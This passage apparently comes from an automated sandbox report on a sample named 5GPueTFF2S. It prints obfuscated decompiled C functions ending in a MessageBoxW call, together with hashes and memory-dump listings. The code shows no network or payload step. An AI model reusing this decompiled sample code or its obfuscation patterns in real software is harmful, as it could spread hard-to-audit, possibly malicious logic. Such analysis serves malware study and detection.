                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: cd709e53d3bceecf584605856fbb50090e35601a90f94f72764c82e41fcf2459
                                              • Instruction ID: 8a6f615cbf910d31e4360cf1714abeb86aba202c9c259de46d9be03df0f1af2f
                                              • Opcode Fuzzy Hash: cd709e53d3bceecf584605856fbb50090e35601a90f94f72764c82e41fcf2459
                                              • Instruction Fuzzy Hash: 7961F531A043998FCB26DF64DA41FFEBBB2EB59300F14509EE485E7259D63B4942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E00EC6E2C(signed int __ebx, signed int __esi, void* __eflags, void* __fp0) {
				signed char _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int _t89;
				intOrPtr _t90;
				signed int _t92;
				signed int _t95;
				signed char _t96;
				void* _t98;
				void* _t101;
				void* _t107;
				WCHAR* _t110;
				signed char _t117;
				signed short _t125;
				signed int _t136;
				signed int _t139;
				signed int _t145;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				signed int _t165;
				signed int _t167;
				signed int _t175;
				signed int _t184;
				signed int _t187;
				signed int _t198;
				WCHAR* _t199;
				signed int _t207;
				signed int _t208;
				signed int _t211;
				signed int _t216;
				signed int _t219;
				void* _t221;
				void* _t226;

				_t218 = __esi;
				_t136 = __ebx;
				asm("ror byte [edx+esi*2-0x55], cl");
				_pop(es);
				if(__eflags > 0) {
					asm("cdq");
					_push(__esi);
					__eflags = _t79 & 0x000000a7;
					asm("sbb al, 0xe7");
					_t80 = 0x10;
					asm("pushfd");
					_t218 = 0x9e576e70;
					asm("outsb");
					asm("sahf");
					L12:
					 *_t139 =  *_t139 + _t80;
					 *_t80 =  *_t80 + _t80;
					 *_t80 =  *_t80 + _t80;
					__eflags =  *_t80;
					L13:
				} else {
					asm("lodsb");
					asm("sbb al, 0xe7");
					asm("movsb");
					_push(ds);
					_t30 = __ah;
					__ah = __bl;
					__bl = _t30;
					__eflags = _t30 -  *((intOrPtr*)(__esi + 0x134ba1eb));
					_push(__esi);
					__eflags = 0;
					__fp0 = __fp0 +  *__esi;
				}
				 *(_t221 + _t218 * 2 - 0x160) = ( *(_t221 + _t218 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
				_t218 = _t218 + 1;
				if(_t218 < 6) {
					_t175 =  *((intOrPtr*)(_t221 - 0xb));
					_t226 =  *0x1000c9b - _t175; // -28
					if(_t226 >= 0) {
						if( *((intOrPtr*)(_t221 - 1)) == 0) {
							_t83 =  *((intOrPtr*)(_t221 - 0x6c));
							_t211 =  *(_t221 - 0x34);
							asm("cdq");
							__eflags = _t83 -  *((intOrPtr*)(_t221 - 0x38));
							if(_t83 !=  *((intOrPtr*)(_t221 - 0x38))) {
								L6:
								 *(_t221 - 0x90) =  *((intOrPtr*)(_t221 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *((intOrPtr*)(_t221 - 1));
								 *(_t221 - 0x2c) =  *(_t221 - 0x2c) - ( *(_t221 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
								 *0x1000ca0 =  *0x1000ca0 +  *(_t221 - 0x7c);
								 *0x1000c9e =  *0x1215420;
								 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t221 - 0x40));
								asm("sbb [0x1000c8c], eax");
							} else {
								__eflags = _t175 - _t211;
								if(_t175 == _t211) {
									_t165 =  *0x1000c88 |  *0x1000c8c;
									__eflags = _t165;
									 *_t165 =  *_t165 + _t83;
									__eflags =  *_t165;
									if( *_t165 != 0) {
										_t216 =  *(_t221 - 0x74);
										_t89 =  *0x1000c83 & 0x000000ff;
										asm("cdq");
										_t167 =  *(_t221 - 0x78) - _t89;
										__eflags = _t167;
										asm("enter 0xfa1b, 0x8b");
										_push(_t221);
										 *(_t136 - 0x35dc73bb) = _t167;
										 *(_t221 - 0x78) = _t167;
										 *(_t221 - 0x74) = _t216 & _t89;
										 *(_t221 - 0xa) = ( *(_t221 - 0xa) & 0x000000ff) + ( *(_t221 - 0x18) & 0x0000ffff);
										_t90 =  *((intOrPtr*)(_t221 - 4));
										 *0x1000cf0 = _t136;
										_t139 = _t90 +  *0x1000cc8 + 1;
										__eflags = _t139;
										 *0x1000cd4 = _t139;
										 *0x1000cf4 = 0;
										_t80 = _t90 + 0x1000cf4;
										__eflags = _t80;
										goto L12;
									}
								} else {
									goto L6;
								}
							}
						} else {
							_t145 =  *0x1000d04; // 0xffffffff
							asm("cdq");
							_t92 =  *0x1000d00; // 0xfffff835
							_t184 = _t175 & _t145;
							 *0x1000d00 = E00ECEE50( *(_t221 - 0x1c) & _t92, _t184, _t92, _t145);
							 *0x1000d04 = _t184;
						}
					}
					goto L13;
				}
				_t146 =  *0x1000d00; // 0xfffff835
				 *0x1000ce0 = 2;
				 *0x1000ce4 = 0;
				 *(_t221 - 0x70) = _t146 * 0x6eb594ba;
				_t148 =  *0x1000ce4; // 0x0
				 *0x110030c =  *(_t221 - 0x60);
				_t95 =  *0x1000ce0; // 0x0
				_t187 = _t95 | _t148;
				if(_t187 == 0) {
					 *((intOrPtr*)(_t221 - 0xbc)) = 0;
					__eflags =  *(_t221 - 6);
					if( *(_t221 - 6) != 0) {
						_t96 = 0;
						__eflags = 0;
					} else {
						_t96 = 1;
					}
					_t150 =  *0x1000d00 + _t96;
					__eflags = _t150;
					 *((short*)(_t221 - 0x24)) =  !_t150;
				} else {
					if(_t95 != 1 || _t148 != 0) {
						if(_t95 == 2 && _t148 == 0) {
							_t125 =  *0x1000cdc; // 0x84521e70
							 *(_t221 - 0x60) = ( *(_t221 - 0x68) ^ _t125 ^  *0x1000d00) * (_t125 + 0xffffbb58);
							_t207 =  *0x1000c94; // 0x0
							_t208 = _t207 * 0x2d40daef;
							 *(_t221 - 0x7c) =  *(_t221 - 0x7c) * ( *0x1000cec & 0x0000ffff);
							 *(_t221 - 0x90) = _t208;
							asm("cdq");
							 *((intOrPtr*)(_t221 - 0x38)) = ( *(_t221 - 0x84) & 0x0000ffff) + ( *(_t221 - 0x84) & 0x0000ffff) + ( *(_t221 - 0x84) & 0x0000ffff) + ( *(_t221 - 0x84) & 0x0000ffff) + ( *(_t221 - 0x84) & 0x0000ffff) + ( *(_t221 - 0x84) & 0x0000ffff) + ( *(_t221 - 0x84) & 0x0000ffff) + ( *(_t221 - 0x84) & 0x0000ffff);
							 *(_t221 - 0x34) = _t208;
						}
					} else {
						asm("cdq");
						 *0x1000cb8 =  *((intOrPtr*)(_t221 - 4)) - 0x4fef3c23;
						 *0x1000cbc = _t187;
						 *((intOrPtr*)(_t221 - 0x4c)) =  *0x1215420;
						 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
					}
				}
				 *((short*)(_t221 - 0x154)) =  ~(( *(_t221 - 0xc4) +  *((intOrPtr*)(_t221 - 0xa4))) *  *(_t221 - 0xc4) *  *(_t221 - 0x14) ^ 0x0000701c);
				_t98 = 0x20b;
				do {
					 *((char*)(_t221 - 0xb)) =  *((char*)(_t221 - 0xb)) + 1;
					_t98 = _t98 - 1;
				} while (_t98 > 0);
				_t101 = ( *(_t221 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
				 *0x1000c84 = 0;
				if(_t101 != 0) {
					_t219 = 0;
					__eflags = 0;
				} else {
					_t64 = _t101 + 1; // 0x20b
					_t219 = _t64;
				}
				asm("cdq");
				_t198 =  *(_t221 - 0x2c);
				asm("cdq");
				asm("adc edx, [0x1000cc4]");
				_t107 = E00ECEE50(( *(_t221 - 0x18) & 0x0000ffff) + ( *(_t221 - 0xc) & 0x000000ff) + 1,  *(_t221 - 0xc), _t198 +  *0x1000cc0, _t198);
				asm("sbb edx, edi");
				 *0x1000c83 = 1;
				if((_t107 - _t219 | _t198) != 0) {
					 *0x1000c83 = 0;
				}
				if( *0x1000c84 == 0) {
					 *((short*)(_t221 - 0x24)) = 0x83;
					asm("cdq");
					 *0x1000cc8 = ( *(_t221 - 0x18) & 0x0000ffff) + 0xf;
					_t117 =  *0x1000cd0; // 0x0
					 *0x1000ccc = _t198;
					 *((char*)(_t221 - 5)) =  *((intOrPtr*)(_t221 - 3)) +  *((intOrPtr*)(_t221 - 0x28)) + (_t117 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
					asm("cdq");
					 *((intOrPtr*)(_t221 - 0xa0)) =  *((intOrPtr*)(_t221 - 0xa0)) -  *0x1000cd0 - 0x3811;
					asm("sbb [ebp-0x9c], edx");
				}
				_t77 = _t221 - 0x160; // 0x60f1ba1c
				_t199 = _t77;
				_t78 = _t221 - 0x1ac; // 0x60f1b9d0
				_t110 = _t78;
				MessageBoxW(GetForegroundWindow(), _t110, _t199, 0x10);
				return 0;
			}





































                                              0x00ec6e2c
                                              0x00ec6e2c
                                              0x00ec6e2d
                                              0x00ec6e31
                                              0x00ec6e32
                                              0x00ec6dbd
                                              0x00ec6dbe
                                              0x00ec6dbf
                                              0x00ec6dc4
                                              0x00ec6dc6
                                              0x00ec6dc8
                                              0x00ec6dc9
                                              0x00ec6dcb
                                              0x00ec6dcd
                                              0x00ec6d71
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d77
                                              0x00ec6e34
                                              0x00ec6e34
                                              0x00ec6e35
                                              0x00ec6e39
                                              0x00ec6e3a
                                              0x00ec6e3b
                                              0x00ec6e3b
                                              0x00ec6e3b
                                              0x00ec6e3d
                                              0x00ec6e43
                                              0x00ec6e44
                                              0x00ec6e46
                                              0x00ec6e46
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00000000
                                              0x00ec6d6e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00000000
                                              0x00ec6c69
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: 21ebad84b3105609b80b69e99193fca080160f3b225db75c2f9d55302174cea2
                                              • Instruction ID: 4846c30119d71f4378c56fd0b5bf1777aa1fb9078ba17869e364920633a356cf
                                              • Opcode Fuzzy Hash: 21ebad84b3105609b80b69e99193fca080160f3b225db75c2f9d55302174cea2
                                              • Instruction Fuzzy Hash: C961F4359043998ECB26CF74D941FFEBBF2EB59300F1490AAE4C5E7209DA3A4942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6D79 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E00EC6D79(intOrPtr __eax, signed int __ebx, signed int __ecx, signed int __esi) {
				intOrPtr _t71;
				signed int _t80;
				signed int _t83;
				signed char _t84;
				void* _t86;
				void* _t89;
				void* _t95;
				WCHAR* _t98;
				signed char _t105;
				signed short _t113;
				signed int _t124;
				intOrPtr _t125;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				signed int _t135;
				signed int _t154;
				char _t157;
				intOrPtr* _t162;
				signed int _t166;
				signed int _t175;
				signed int _t178;
				signed int _t189;
				WCHAR* _t190;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				void* _t211;

				_t208 = __esi;
				_t130 = __ecx;
				_t127 = __ebx;
				_t71 = __eax;
				asm("sahf");
				while(1) {
					L8:
					 *_t130 =  *_t130 + _t71;
					if( *_t130 != 0) {
						_t206 =  *(_t211 - 0x74);
						_t124 =  *0x1000c83 & 0x000000ff;
						asm("cdq");
						_t157 =  *((intOrPtr*)(_t211 - 0x78)) - _t124;
						asm("enter 0xfa1b, 0x8b");
						_push(_t211);
						 *((char*)(_t127 - 0x35dc73bb)) = _t157;
						 *((intOrPtr*)(_t211 - 0x78)) = _t157;
						 *(_t211 - 0x74) = _t206 & _t124;
						 *(_t211 - 0xa) = ( *(_t211 - 0xa) & 0x000000ff) + ( *(_t211 - 0x18) & 0x0000ffff);
						_t125 =  *((intOrPtr*)(_t211 - 4));
						 *0x1000cf0 = _t127;
						_t162 = _t125 +  *0x1000cc8 + 1;
						 *0x1000cd4 = _t162;
						 *0x1000cf4 = 0;
						_t126 = _t125 + 0x1000cf4;
						 *_t162 =  *_t162 + _t126;
						 *_t126 =  *_t126 + _t126;
						 *_t126 =  *_t126 + _t126;
					}
					while(1) {
						L13:
						L18:
						 *(_t211 + _t208 * 2 - 0x160) = ( *(_t211 + _t208 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
						_t208 = _t208 + 1;
						if(_t208 < 6) {
							L1:
							_t166 =  *((intOrPtr*)(_t211 - 0xb));
							__eflags =  *0x1000c9b - _t166; // -28
							if(__eflags >= 0) {
								L2:
								__eflags =  *(_t211 - 1);
								if( *(_t211 - 1) == 0) {
									_t71 =  *((intOrPtr*)(_t211 - 0x6c));
									_t203 =  *(_t211 - 0x34);
									asm("cdq");
									__eflags = _t71 -  *((intOrPtr*)(_t211 - 0x38));
									if(_t71 !=  *((intOrPtr*)(_t211 - 0x38))) {
										L6:
										 *(_t211 - 0x90) =  *((intOrPtr*)(_t211 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *(_t211 - 1);
										 *(_t211 - 0x2c) =  *(_t211 - 0x2c) - ( *(_t211 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
										 *0x1000ca0 =  *0x1000ca0 +  *(_t211 - 0x7c);
										 *0x1000c9e =  *0x1215420;
										 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t211 - 0x40));
										asm("sbb [0x1000c8c], eax");
									} else {
										__eflags = _t166 - _t203;
										if(_t166 == _t203) {
											_t130 =  *0x1000c88 |  *0x1000c8c;
											__eflags = _t130;
											goto L8;
										} else {
											goto L6;
										}
										do {
											goto L13;
										} while (__eflags >= 0);
										goto L2;
									}
								} else {
									_t154 =  *0x1000d04; // 0xffffffff
									asm("cdq");
									_t80 =  *0x1000d00; // 0xfffff835
									_t175 = _t166 & _t154;
									 *0x1000d00 = E00ECEE50( *(_t211 - 0x1c) & _t80, _t175, _t80, _t154);
									 *0x1000d04 = _t175;
									while(1) {
										L13:
										goto L18;
									}
								}
							}
							L13:
							goto L18;
						}
						_t131 =  *0x1000d00; // 0xfffff835
						 *0x1000ce0 = 2;
						 *0x1000ce4 = 0;
						 *(_t211 - 0x70) = _t131 * 0x6eb594ba;
						_t133 =  *0x1000ce4; // 0x0
						 *0x110030c =  *(_t211 - 0x60);
						_t83 =  *0x1000ce0; // 0x0
						_t178 = _t83 | _t133;
						if(_t178 == 0) {
							 *((intOrPtr*)(_t211 - 0xbc)) = 0;
							__eflags =  *(_t211 - 6);
							if( *(_t211 - 6) != 0) {
								_t84 = 0;
								__eflags = 0;
							} else {
								_t84 = 1;
							}
							_t135 =  *0x1000d00 + _t84;
							__eflags = _t135;
							 *((short*)(_t211 - 0x24)) =  !_t135;
						} else {
							if(_t83 != 1 || _t133 != 0) {
								if(_t83 == 2 && _t133 == 0) {
									_t113 =  *0x1000cdc; // 0x84521e70
									 *(_t211 - 0x60) = ( *(_t211 - 0x68) ^ _t113 ^  *0x1000d00) * (_t113 + 0xffffbb58);
									_t198 =  *0x1000c94; // 0x0
									_t199 = _t198 * 0x2d40daef;
									 *(_t211 - 0x7c) =  *(_t211 - 0x7c) * ( *0x1000cec & 0x0000ffff);
									 *(_t211 - 0x90) = _t199;
									asm("cdq");
									 *((intOrPtr*)(_t211 - 0x38)) = ( *(_t211 - 0x84) & 0x0000ffff) + ( *(_t211 - 0x84) & 0x0000ffff) + ( *(_t211 - 0x84) & 0x0000ffff) + ( *(_t211 - 0x84) & 0x0000ffff) + ( *(_t211 - 0x84) & 0x0000ffff) + ( *(_t211 - 0x84) & 0x0000ffff) + ( *(_t211 - 0x84) & 0x0000ffff) + ( *(_t211 - 0x84) & 0x0000ffff);
									 *(_t211 - 0x34) = _t199;
								}
							} else {
								asm("cdq");
								 *0x1000cb8 =  *((intOrPtr*)(_t211 - 4)) - 0x4fef3c23;
								 *0x1000cbc = _t178;
								 *((intOrPtr*)(_t211 - 0x4c)) =  *0x1215420;
								 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
							}
						}
						 *((short*)(_t211 - 0x154)) =  ~(( *(_t211 - 0xc4) +  *((intOrPtr*)(_t211 - 0xa4))) *  *(_t211 - 0xc4) *  *(_t211 - 0x14) ^ 0x0000701c);
						_t86 = 0x20b;
						do {
							 *((char*)(_t211 - 0xb)) =  *((char*)(_t211 - 0xb)) + 1;
							_t86 = _t86 - 1;
						} while (_t86 > 0);
						_t89 = ( *(_t211 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
						 *0x1000c84 = 0;
						if(_t89 != 0) {
							_t209 = 0;
							__eflags = 0;
						} else {
							_t56 = _t89 + 1; // 0x20b
							_t209 = _t56;
						}
						asm("cdq");
						_t189 =  *(_t211 - 0x2c);
						asm("cdq");
						asm("adc edx, [0x1000cc4]");
						_t95 = E00ECEE50(( *(_t211 - 0x18) & 0x0000ffff) + ( *(_t211 - 0xc) & 0x000000ff) + 1,  *(_t211 - 0xc), _t189 +  *0x1000cc0, _t189);
						asm("sbb edx, edi");
						 *0x1000c83 = 1;
						if((_t95 - _t209 | _t189) != 0) {
							 *0x1000c83 = 0;
						}
						if( *0x1000c84 == 0) {
							 *((short*)(_t211 - 0x24)) = 0x83;
							asm("cdq");
							 *0x1000cc8 = ( *(_t211 - 0x18) & 0x0000ffff) + 0xf;
							_t105 =  *0x1000cd0; // 0x0
							 *0x1000ccc = _t189;
							 *((char*)(_t211 - 5)) =  *((intOrPtr*)(_t211 - 3)) +  *((intOrPtr*)(_t211 - 0x28)) + (_t105 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
							asm("cdq");
							 *((intOrPtr*)(_t211 - 0xa0)) =  *((intOrPtr*)(_t211 - 0xa0)) -  *0x1000cd0 - 0x3811;
							asm("sbb [ebp-0x9c], edx");
						}
						_t69 = _t211 - 0x160; // 0x60f1ba1c
						_t190 = _t69;
						_t70 = _t211 - 0x1ac; // 0x60f1b9d0
						_t98 = _t70;
						MessageBoxW(GetForegroundWindow(), _t98, _t190, 0x10);
						return 0;
					}
				}
			}




































                                              0x00ec6d79
                                              0x00ec6d79
                                              0x00ec6d79
                                              0x00ec6d79
                                              0x00ec6d79
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d77
                                              0x00ec6d77
                                              0x00ec6e48
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c6f
                                              0x00ec6c72
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6d77
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6d77
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6d77
                                              0x00ec6d77
                                              0x00000000
                                              0x00ec6e28
                                              0x00ec6d77
                                              0x00ec6c74
                                              0x00ec6d77
                                              0x00000000
                                              0x00ec6e28
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880
                                              0x00ec7880
                                              0x00ec6d77

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: 5082470dcc704fe191270ea79dd9aebe3f71ddb6a1f984381c63e1f629b5cb1f
                                              • Instruction ID: 3cdc6905c603e2f6f73219461dcc01859a8727848731b1b3538aabe3cd8ac9d7
                                              • Opcode Fuzzy Hash: 5082470dcc704fe191270ea79dd9aebe3f71ddb6a1f984381c63e1f629b5cb1f
                                              • Instruction Fuzzy Hash: E561B275A042998ACB2ACF74D951FFEBBF2EB59300F14506EE4C5E7349DA3A4942CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6E19 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E00EC6E19(void* __eax, void* __ecx, void* __fp0) {
				void* __edi;
				void* __esi;
				intOrPtr _t78;
				signed int _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				signed int _t88;
				signed int _t91;
				signed char _t92;
				void* _t94;
				void* _t97;
				void* _t103;
				WCHAR* _t106;
				signed char _t113;
				signed short _t121;
				signed int _t132;
				signed int _t141;
				signed int _t142;
				signed int _t144;
				signed int _t161;
				char _t163;
				short _t168;
				signed int _t169;
				signed int _t175;
				signed int _t186;
				WCHAR* _t187;
				signed int _t195;
				signed int _t196;
				signed int _t206;
				signed int _t207;
				signed int _t212;
				signed int _t214;
				void* _t215;
				void* _t217;
				void* _t220;

				asm("sahf");
				asm("cdq");
				__fp0 = __fp0 +  *((intOrPtr*)(__esp + __ebp * 4));
				asm("sbb al, 0xe7");
				asm("pushfd");
				__esi = 0x9e576e70;
				asm("outsb");
				asm("sahf");
				while(1) {
					L12:
					 *_t168 =  *_t168 + _t86;
					 *_t86 =  *_t86 + _t86;
					 *_t86 =  *_t86 + _t86;
					while(1) {
						L13:
						L14:
						 *(_t217 + _t214 * 2 - 0x160) = ( *(_t217 + _t214 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
